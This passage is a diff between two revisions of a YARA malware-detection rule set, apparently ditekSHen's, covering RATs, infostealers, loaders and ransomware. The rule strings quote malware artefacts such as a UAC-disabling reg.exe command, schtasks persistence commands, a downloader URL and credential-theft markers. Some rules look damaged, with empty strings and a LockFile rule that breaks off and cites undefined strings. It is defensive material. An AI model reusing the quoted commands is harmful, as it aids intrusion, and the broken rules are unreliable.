ascii - $r1 = "^1[a-km-zA-HJ-NP-Z1-9]{25,34}$" wide - $r2 = "^3[a-km-zA-HJ-NP-Z1-9]{25,34}$" wide - $r3 = "^([a-zA-Z0-9_\\-\\.]+)@([a-zA-Z0-9_\\-\\.]+)\\.([a-zA-Z]{2,5})$" wide - $r4 = "^(?!:\\/\\/)([a-zA-Z0-9-_]+\\.)*[a-zA-Z0-9][a-zA-Z0-9-_]+\\.[a-zA-Z]{2,11}?$" wide + $s1 = "scp%s%s%s%s" ascii + $s2 = "putfile %s %s" ascii + $s3 = "pscp|%s|%s:%s" ascii + $s4 = "connect %host %port\\n" ascii + $s5 = "/ecoute/spool/%s-%lu" ascii + $s6 = "" ascii + $s7 = "CMPT;%s;%s;%s;%s;%s" ascii + $s8 = "%s\\apoScreen%lu.dll" ascii + $s9 = "/cap/%s%lu.jpg" ascii + $s10 = "INFO;%u;%u;%u;%d;%d;%d;%d;%d;%d;%d;%s" ascii + $s11 = "SUBJECT: %s is comming!" ascii + $s12 = "Content-type: multipart/mixed; boundary=\"#BOUNDARY#\"" ascii + $s13 = "FROM: %s@yahoo.com" ascii + $s14 = "" ascii + $s15 = "" ascii condition: - uint16(0)==0x5a4d and ((1 of ($x*) and (2 of ($s*) or 2 of ($r*))) or 7 of ($s*) or (5 of ($s*) and 2 of ($r*)) or ( all of ($r*) and 4 of ($s*))) + uint16(0)==0x5a4d and 10 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Arrowrat : FILE +rule DITEKSHEN_MALWARE_Win_Coinminer04 : FILE { meta: - description = "Detects ArrowRAT" + description = "Detects coinmining malware" author = "ditekSHen" - id = "14d3aabe-1ef5-599f-adbd-61b580099447" - date = "2024-09-06" - modified = "2024-09-06" + id = "d90d8ad3-20b7-5bb4-8c58-3488c60ed9a2" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L9943-L9961" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "13e6d4fd274f75c50aa4110276812d02885c03cfc269dde480db66955e5f703a" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L7838-L7858" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "2ef60dbf0bac3d5910635bb011a45e5ebc1392094b10425604fa9dd290198f8b" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cV2lubG9nb" wide - $s2 = "Software\\Classes\\ms-settings\\shell\\open\\command" wide - $s3 = "DelegateExecute" fullword wide - $s4 = "powershell" wide - $s5 = "DESKTOP_HOOKCONTROL" fullword ascii - $s6 = "PROCESS_INFORMATION" fullword ascii - $s7 = "STARTUP_INFORMATION" fullword ascii - $s8 = /(Venom|Pandora)\shVNC/ fullword wide - $s9 = "cmd.exe /k START" fullword wide - $s10 = "ExclusionWD" fullword ascii - $s11 = "WinExec" fullword ascii + $s1 = "createDll" fullword ascii + $s2 = "getTasks" fullword ascii + $s3 = "SetStartup" fullword ascii + $s4 = "loadUrl" fullword ascii + $s5 = "Processer" fullword ascii + $s6 = "checkProcess" fullword ascii + $s7 = "runProcess" fullword ascii + $s8 = "createDir" fullword ascii + $cnc1 = "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0" fullword wide + $cnc2 = "?hwid=" fullword wide + $cnc3 = "?timeout=1" fullword wide + $cnc4 = "&completed=" fullword wide + $cnc5 = "/cmd.php" wide condition: - uint16(0)==0x5a4d and 5 of them + uint16(0)==0x5a4d and (5 of ($s*) and 1 of ($cnc*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Ducktail : FILE +rule DITEKSHEN_MALWARE_Win_Sidewalk : FILE { meta: - description = "Detects DuckTail" + description = "Detects SideWalk" author = "ditekSHen" - id = "2d1a8f9e-ed5f-53fa-8ba8-b6d1344f6d39" - date = "2024-09-06" - modified = "2024-09-06" + id = "ab82b83a-a279-555a-83c2-6340431b10da" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L9963-L9991" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "a416212e5f87b33fdc14590c3d6d6ebc2915c2b383adf78d660c9408beb2323f" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L7860-L7880" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "6885a1ad69d61fa5875ee0db949071e84390fc2db4307c412b32cd17c0806f6a" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "&global_scope_id=" wide - $s2 = "#ResolveMyIpAll" wide - $s3 = "#ApproveInvitesHandler" wide - $s4 = "#ProcessShareCok" wide - $s5 = "#InviteEmpHandler" wide - $s6 = "__activeScenarioIDs=%" wide - $s7 = "&__a=1&fb_dtsg=" wide - $s8 = "adAccountLimit\":(.*?)}" wide - $s9 = "|PUSH|" fullword wide - $s10 = "|SCREEN|" fullword wide - $s11 = "|SCREEC|" fullword wide - $s12 = "_ad_accounts>k__" ascii - $s13 = "get_Pwds" fullword ascii - $s14 = "Telegram.Bot" ascii - $s15 = { 2f 00 7b 00 43 00 59 00 52 00 7d 00 2e 00 74 00 - 78 00 74 00 00 15 2f 00 7b 00 4c 00 4f 00 47 00 - 7d 00 2e 00 74 00 78 00 74 00 00 15 2f 00 7b 00 - 43 00 46 00 47 00 7d 00 2e 00 74 00 78 00 74 00 - 00 15 2f 00 7b 00 50 00 52 00 53 00 7d 00 2e 00 - 74 00 78 00 74 00 00 15 2f 00 7b 00 53 00 43 00 - 52 00 7d 00 2e 00 6a 00 70 00 67 } + $s1 = "Decommit" fullword ascii + $s2 = "Shellc0deRunner" fullword ascii + $s3 = "shellc0de" fullword ascii + $s4 = "C:\\Windows\\System32\\msdt.exe" fullword wide + $s5 = "StartProcessWOPid" fullword ascii + $s6 = "StartProcessWithParent" fullword ascii + $m1 = "alloctype" fullword ascii + $m2 = "ThreadIoPriority" fullword ascii + $m3 = "PebAddress" fullword ascii + $m4 = "dotnet.4.x64.dll" fullword wide + $m5 = "LogonNetCredentialsOnly" fullword ascii + $m6 = "ThreadIdealProcessor" fullword ascii + $m7 = "LogonWithProfile" fullword ascii condition: - uint16(0)==0x5a4d and 13 of them + uint16(0)==0x5a4d and (5 of ($s*) or all of ($m*) or (11 of them )) } import "pe" -rule DITEKSHEN_MALWARE_Win_Grum : FILE +rule DITEKSHEN_MALWARE_Win_Vanillarat : FILE { meta: - description = "Detect Grum spam bot" + description = "Detects VanillaRAT" author = "ditekSHen" - id = "e9abaed1-f462-5099-b310-9f9244c0c8a2" - date = "2024-09-06" - modified = "2024-09-06" + id = "70c2cd1a-a6d4-562e-a6fc-c16a9e87c6b7" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L9993-L10007" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "42a1d57dcddda4a24037af136caace6110b90ee5702c7c01d2a77d2676048c74" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L7882-L7902" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "d7b90ac88a50693ec4bb0676c04f5d161f04f67970ea60d80e79d774da75bfdc" score = 75 - quality = 50 + quality = 75 tags = "FILE" strings: - $s1 = "loader_id" fullword ascii - $s2 = "start_srv" fullword ascii - $s3 = "lid_file_upd" fullword ascii - $s4 = "----=_NextPart_%03d_%04X_%08.8lX.%08.8lX" fullword ascii - $s5 = "rcpt to:<%s>" fullword ascii - $s6 = "ehlo %s" fullword ascii - $s7 = "%OUTLOOK_BND_" fullword ascii + $stub = "VanillaStub." ascii wide + $s1 = "Client.Send: " wide + $s2 = "Connected to chat" fullword wide + $s3 = "GetStoredPasswords" fullword wide + $s4 = "Started screen locker." fullword wide + $s5 = "[<\\MOUSE>]" fullword wide + $s6 = "YOUR SCREEN HAS BEEN LOCKED!" fullword wide + $s7 = "record recsound" fullword wide + $f1 = "d__" ascii + $f2 = "d__" ascii + $f3 = "k__" ascii + $f4 = "k__" ascii + $f5 = "KillClient" fullword ascii condition: - ( uint16(0)==0x5a4d and 5 of them ) or ( all of them ) + uint16(0)==0x5a4d and (($stub and (2 of ($s*) or 2 of ($f*))) or 6 of ($s*) or all of ($f*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Dlinjector07 : FILE +rule DITEKSHEN_MALWARE_Win_Sectoprat : FILE { meta: - description = "Detects downloader injector" + description = "Detects SectopRAT" author = "ditekSHen" - id = "244ad6fb-8769-5b57-84e2-66f51fccb32a" - date = "2024-09-06" - modified = "2024-09-06" + id = "d6594834-24d7-5e86-84b5-5a7920e7bc89" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L10009-L10025" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "aef43b59ef7d0d62a853280ec1588a48d6c21da5218b7fd7e6ab1aa0f048896b" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L7904-L7929" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "b4048f837c02560a8b650247173be25893b466e5cec8f2784eea58172f973822" score = 75 - quality = 73 + quality = 75 tags = "FILE" strings: - $x1 = "23lenrek[||]lldtn[||]daerhTemuseR[||]txetnoCdaerhTteS46woW[||]txetnoCdaerhTteS[||]txetnoCdaerhTteG46woW[||]txetnoCdaerhTteG[||]xEcollAlautriV[||]yromeMssecorPetirW[||]yromeMssecorPdaeR[||]noitceSfOweiVpamnUwZ[||]AssecorPetaerC" wide - $l1 = "[||]" wide - $r1 = "yromeMssecorPetirW" wide - $r2 = "xEcollAlautriV" wide - $r3 = "daerhTemuseR" ascii wide - $r4 = "noitceSfOweiVpamnUwZ" wide - $s1 = "Debugger Detected" fullword wide - $s2 = "payload" fullword ascii - $s3 = "_ENABLE_PROFILING" fullword wide + $s1 = "\\\\.\\root\\cimv2:Win32_Process" wide + $s2 = "\\\\.\\root\\cimv2:CIM_DataFile.Name=" wide + $s3 = "^.*(?=Windows)" fullword wide + $s4 = "C:\\Windows\\System32\\cmd.exe" wide + $s5 = "C:\\Windows\\explorer.exe" wide + $s6 = "Disabling IE protection" wide + $s7 = "stream started succces" wide + $b1 = "/C start Firefox" wide + $b2 = "/C start chrome" wide + $b3 = "/C start iexplore" wide + $m1 = "DefWindowProc" fullword ascii + $m2 = "AuthStream" fullword ascii + $m3 = "KillBrowsers" fullword ascii + $m4 = "GetAllNetworkInterfaces" fullword ascii + $m5 = "EnumDisplayDevices" fullword ascii + $m6 = "RemoteClient.Packets" fullword ascii + $m7 = "IServerPacket" fullword ascii + $m8 = "keybd_event" fullword ascii condition: - uint16(0)==0x5a4d and (1 of ($x*) or (1 of ($l*) and 2 of ($r*)) or 6 of them ) + uint16(0)==0x5a4d and ((5 of ($s*) and 2 of ($b*)) or all of ($s*) or ( all of ($b*) and (4 of ($s*) or 5 of ($m*)))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Stealerium : FILE +rule DITEKSHEN_MALWARE_Win_Neptune : FILE { meta: - description = "Detects Stealerium infostealer" + description = "Detects Neptune keylogger / infostealer" author = "ditekSHen" - id = "ea137900-3add-54b4-9ce9-bc7e98f86d41" - date = "2024-09-06" - modified = "2024-09-06" + id = "0f619bea-f00b-5078-95a4-83306e3e87b4" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L10027-L10042" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "a2834e7fe26ad0197a9e490ab517029ceed2e09506fcc37e6ddf0c1804fa6cb9" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L7931-L7953" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "e3298bf55f89180ed7e9f7ad35b59d39284a5143fd69fa2a4fbc27d91fb2fbd3" score = 75 - quality = 73 + quality = 75 tags = "FILE" strings: - $x1 = "Stealerium" ascii wide - $x2 = /\.Target\.(Passwords|Messengers|Browsers|VPN|Gaming)\./ ascii - $x3 = /\.Modules\.(Keylogger|Implant|Passwords|Messengers|Browsers|VPN|Gaming|Clipper)\./ ascii - $s1 = "Timeout /T 2 /Nobreak" fullword wide - $s2 = "Directory not exists" wide - $s3 = "### {0} ### ({1})" wide - $s4 = /---\s(AntiAnalysis|WebcamScreenshot|Keylogger|Clipper)/ wide - $s5 = " *Keylogger " fullword wide + $x1 = "your keylogger has been freshly installed on" wide + $x2 = "Attached is a screenshot of the victim" wide + $x3 = "color: rgb(2, 84, 138);'>Project Neptune
" wide + $x4 = ">{Monitor Everything}

" wide + $x5 = "[First Run] Neptune" wide + $x6 = "Neptune - " wide + $s1 = "Melt" fullword wide + $s2 = "Hide" fullword wide + $s3 = "SDDate+" fullword wide + $s4 = "DelOff+" fullword wide + $s5 = "MsgFalse+" fullword wide + $s6 = "Clipboard:" fullword wide + $s7 = "information is valid and working!" wide + $s8 = ".exe /k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f" wide + $s9 = "http://www.exampleserver.com/directfile.exe" fullword wide condition: - uint16(0)==0x5a4d and ( all of ($x*) or (2 of ($x*) and all of ($s*))) + uint16(0)==0x5a4d and (2 of ($x*) or 7 of ($s*) or (1 of ($x*) and 5 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Linux_Gobrat : FILE +rule DITEKSHEN_MALWARE_Win_Tomiris : FILE { meta: - description = "Detects GobRAT" + description = "Detects Tomiris" author = "ditekSHen" - id = "0561fa99-24ee-5e02-ba54-17a1dd81daa4" - date = "2024-09-06" - modified = "2024-09-06" + id = "86efd4fb-3c76-504e-b367-132aee59e09a" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L10044-L10062" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "070687c909b066e38f72b6421b77670e87476d7e1eb1ed8d41d027836629eb71" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L7955-L7978" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "1d9baeb6db2e849dd053c3fc735984e23b9cead39cf166f8a544ee5a439185d1" score = 75 quality = 75 tags = "FILE" strings: - $x1 = "BotList" ascii - $x2 = "BotCount" ascii - $x3 = "/etc/services/zone/bot.log" ascii - $x4 = "aaa.com/bbb/me" ascii - $s1 = "encoding/gob." ascii - $s2 = ".GetMacAddress" ascii - $s3 = ".IpString2Uint32" ascii - $s4 = ".RegisterLogFile" ascii - $s5 = ".UniqueAppendString" ascii - $s6 = ".NewDaemon" ascii - $s7 = ".SimpleCommand" ascii + $f1 = "main.workPath" ascii + $f2 = "main.selfName" ascii + $f3 = "main.infoServerAddr" ascii + $f4 = "main.configFileName" ascii + $s1 = "C:/Projects/go/src/Tomiris/main.go" ascii + $s2 = "C:/GO/go1.16.2/src/os/user/lookup_windows.go" ascii + $s3 = "C:\\GO\\go1.16.2" ascii + $s4 = ".html.jpeg.json.wasm.webp/p/gf/p/kk1562515" ascii + $s5 = "\" /ST 10:00alarm clockassistQueueavx512vbmi2avx512vnniwbad" ascii + $s6 = "write /TR \" Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p=" ascii + $t1 = "SCHTASKS /DELETE /F /TN \"%s\"" ascii + $t2 = "SCHTASKS /CREATE /SC DAILY /TN" ascii + $t3 = "SCHTASKS /CREATE /SC ONCE /TN \"%s\" /TR \"%s\" /ST %s" ascii + $t4 = "SCHTASKS /CREATE /SC ONCE /TN \"%s\" /TR \"'%s' %s\" /ST %s" ascii + $r1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones" ascii + $r2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" ascii condition: - uint16(0)==0x457f and (3 of ($x*) or (2 of ($x*) and 3 of ($s*)) or (1 of ($x*) and 5 of ($s*)) or all of ($s*)) + uint16(0)==0x5a4d and (( all of ($f*) and 3 of ($s*) and 2 of ($t*) and 1 of ($r*)) or (4 of ($s*) and 2 of ($t*) and 1 of ($r*)) or 12 of them ) } import "pe" -rule DITEKSHEN_MALWARE_Win_Hakunamatata : FILE +rule DITEKSHEN_MALWARE_Win_Jennlog : FILE { meta: - description = "Detects HakunaMatata ransomware" + description = "Detects JennLog loader" author = "ditekSHen" - id = "43ca40bb-9eb6-558e-977d-f1fff5659565" - date = "2024-09-06" - modified = "2024-09-06" + id = "38f8cd13-f157-5cce-bf04-80c29d254144" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L10064-L10084" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "b49705845e5440c3c1e47e196592ca2b31319d1af5265f2f954d3367e3d39d5c" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L7980-L7996" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "085a4783c7c01ec95491d9999d1835ad9ab3dc70d77b944578e097b3ffe3a627" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide - $s2 = "(?:[13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})" wide - $s3 = "" wide - $s4 = "HAKUNA MATATA" ascii wide - $s5 = "EXCEPTIONAL_FILE" ascii - $s6 = "TRIPLE_ENCRYPT" ascii - $s7 = "FULL_ENCRYPT" ascii - $s8 = "TARGETED_EXTENSIONS" ascii - $s9 = "CHANGE_PROCESS_NAME" ascii - $s10 = "KILL_APPS_ENCRYPT_AGAIN" ascii - $s11 = "b__" ascii - $s12 = "dataToEncrypt" ascii - $s13 = "" ascii + $x1 = "%windir%\\system32\\rundll32.exe advapi32.dll,ProcessIdleTasks" fullword wide + $x2 = "https://fkpageintheworld342.com" fullword wide + $s1 = "ExecuteInstalledNodeAndDelete" fullword ascii + $s2 = "ProcessExsist" fullword ascii + $s3 = "helloworld.Certificate.txt" fullword wide + $s4 = "ASCII85 encoded data should begin with '" fullword wide + $s5 = "] WinRE config file path: C:\\" ascii + $s6 = "] Parameters: configWinDir: NULL" ascii + $s7 = "] Update enhanced config info is enabled." ascii condition: - uint16(0)==0x5a4d and 5 of them + uint16(0)==0x5a4d and ((1 of ($x*) and 3 of ($s*)) or 5 of ($s*) or ( all of ($x*) and 2 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Hakunamatata_Builder : FILE +rule DITEKSHEN_MALWARE_Win_Lockfile : FILE { meta: - description = "Detects HakunaMatata ransomware builder" + description = "Detects LockFile ransomware" author = "ditekSHen" - id = "dbf3490f-418c-5d3b-9f9e-e9fb29d8b652" - date = "2024-09-06" - modified = "2024-09-06" + id = "762ac376-43ff-56d2-b279-2879ce6d8542" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L10086-L10104" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "ac258851de38504cf63ba51fd06f8a9a3dfbe0096d199ba702e9763b5ecc43e4" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L7998-L8014" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "28c8aa8931d599e5a1860fe2ed0b8172e709dad1a48a319858a907fa775af293" score = 75 - quality = 73 + quality = 71 tags = "FILE" strings: - $s1 = "ENCRYPT FILES IN PROCESS" wide - $s2 = "#TARGET_FILES" ascii wide - $s3 = "HAKUNA MATATA" ascii wide nocase - $s4 = "#PRIVATE_KEY" ascii wide - $s5 = "/target:winexe /platform:anycpu /optimize+" wide - $s6 = "/win32icon:" fullword wide - $s7 = "SkippedFolders" ascii - $s8 = "RECURSIVE_DIRECTORY_LOOK(" ascii - $s9 = "DRAW_WALLPAPER(" ascii - $s10 = "startupKey.SetValue(MESSAGE_FILE.Split('.')[0], executablePath);" ascii - $s11 = /\\obj\\(Debug|Release)\\Hakuna\sMatata\.pdb/ ascii + $x1 = "LOCKFILE" fullword ascii + $x2 = "25a01bb859125507013a2fe9737d3c33" fullword ascii + $s1 = "" fullword ascii + $s2 = "%s" fullword ascii + $s3 = "%d" fullword ascii + $s4 = "%s\\%s-%s-%d%s" fullword ascii + $s5 = ">RAC=OQD:S>P@:AO?R:EEOS:ARDD=N?EENSB" ascii wide + $m1 = "LOCKFILE" ascii wide nocase + $m2 = "5) + uint16(0)==0x5a4d and (1 of ($x*) or 8 of ($s*) or (4 of ($b*) and 4 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Povertystealer : FILE +rule DITEKSHEN_MALWARE_Win_Onlylogger : FILE { meta: - description = "Detects PovertyStealer" + description = "Detects OnlyLogger loader variants" author = "ditekSHen" - id = "a431b82a-81cb-51a9-b3a8-61d71f36a60e" - date = "2024-09-06" - modified = "2024-09-06" + id = "525aa2a0-5090-5f96-999b-67ca4379f897" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L10904-L10917" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "0d8a4dd1f3a9935935878840d19e16d91d240da776f99eb2dd3f12df96efa1d9" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L8863-L8882" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "1b39a4d2a6d3a2633cfa98adc1dfe99d10d2493fd06c9f875c56ec7689b7a561" score = 75 - quality = 75 + quality = 50 tags = "FILE" - clamav1 = "MALWARE.Win.Trojan.PovertyStealer" strings: - $x1 = "Poverty is the parent of crime." ascii - $s2 = "OperationSystem: %d:%d:%d" ascii - $s3 = "ScreenSize: {lWidth=%d, lHeight=%d}" ascii - $s4 = "VideoAdapter #%d: %s" ascii - $s5 = "$d.log" fullword wide + $s1 = { 45 6c 65 76 61 74 65 64 00 00 00 00 4e 4f 54 20 65 6c 65 76 61 74 65 64 } + $s2 = "\" /f & erase \"" ascii + $s3 = "/c taskkill /im \"" ascii + $s4 = "KILLME" fullword ascii + $s5 = "C:\\Windows\\System32\\cmd.exe" fullword ascii + $gn = ".php?pub=" ascii + $ip = /\/1[a-z0-9A-Z]{4,5}/ fullword ascii + $h1 = "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1" fullword ascii + $h2 = "Accept-Language: ru-RU,ru;q=0.9,en;q=0.8" fullword ascii + $h3 = "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1" fullword ascii + $h4 = "Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0" fullword ascii + $h5 = "Content-Type: application/x-www-form-urlencoded" fullword wide condition: - (( uint16(0)==0x5a4d and (1 of ($x*) or all of ($s*))) or all of them ) + uint16(0)==0x5a4d and ( all of ($s*) or (#ip>5 and ($gn or 3 of ($s*) or all of ($h*))) or ( all of ($h*) and 3 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Janelarat : FILE +rule DITEKSHEN_MALWARE_Win_Blackbytego : FILE { meta: - description = "Detects JanelaRAT" + description = "Detects BlackByte ransomware Go variants" author = "ditekSHen" - id = "6a49eeda-307f-5429-aa24-658223360239" - date = "2024-09-06" - modified = "2024-09-06" + id = "25431446-8cce-54cc-925d-5d9147344c6d" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L10919-L10939" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "9f10112b6ffa382b03511e7b6c8757438d5910ee2c24d650d05bb53abfff3860" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L8884-L8904" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "b3e6a4a2f043293e8693cfbe1515681ce0616d98e2492732fc06a01a96309883" score = 75 quality = 75 tags = "FILE" strings: - $x1 = "k__" ascii - $x2 = "janela" fullword ascii - $x3 = "\\CSHARP\\RAT\\" ascii - $s1 = "k__" ascii - $s2 = "b__" ascii - $s3 = "hookStruct" fullword ascii - $s4 = "[^a-zA-Z]" fullword wide - $s5 = "GetRecycled" fullword ascii - $s6 = "import \"bcl.proto\";" wide - $s7 = "\\KL_FINAL\\" ascii - $s8 = "\\KL_FASEAVAST" ascii - $s9 = "\\kl c++" ascii - $s10 = "VisaoAPP" ascii wide + $x1 = "BlackByteGO/_cgo_gotypes.go" fullword ascii + $x3 = "BlackByteGO/" ascii nocase + $s1 = ".Disconnect" ascii + $s2 = ".OpenService" ascii + $s3 = ".ListServices" ascii + $s4 = ".Start" ascii + $s5 = ".Encrypt" ascii + $s6 = ".Decrypt" ascii + $s7 = ".MustFindProc" ascii + $s8 = ".QuoRem" ascii + $s9 = "C:\\Windows\\regedit.exe" fullword wide condition: - uint16(0)==0x5a4d and ( all of ($x*) or (2 of ($x*) and 3 of ($s*)) or (1 of ($x*) and 5 of ($s*)) or (6 of ($s*))) + uint16(0)==0x5a4d and (1 of ($x*) or all of ($s*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Qwixxrat : FILE +rule DITEKSHEN_MALWARE_Win_Vulturi : FILE { meta: - description = "Detects QwixxRAT. Uses ToxicEye / TelegramRAT as base (MALWARE_Win_TelegramRAT)" + description = "Detects Vulturi infostealer" author = "ditekSHen" - id = "0a8f2f6f-aa78-56c2-aca0-d575fbf0b91e" - date = "2024-09-06" - modified = "2024-09-06" + id = "dca814d6-ca26-5315-9f80-628ee50e8dfa" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L10941-L10953" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "e6e44697e393da35215f7835f122cb74b05dbeebb558345d5110d6fbc809f4dd" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L8906-L8931" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "4d1d88764dd72ae78a74b802e11c2f28899b7b9f45c54cf3bf7aaac49dd48d7f" score = 75 quality = 75 tags = "FILE" strings: - $s1 = /Qwixx(\s)?Stealer/ ascii wide - $s2 = "discord.gg/UXVFHzTjYe" wide - $s3 = "t.me/QwixxTwixx" wide - $s4 = "Secret Qwixx" wide - $s5 = "\\Qwixx Rat\\" ascii + $x1 = "Vulturi_" ascii wide + $x2 = "VulturiProject" fullword ascii + $s1 = { 5b 00 2d 00 5d 00 20 00 53 00 65 00 72 00 76 00 + 65 00 72 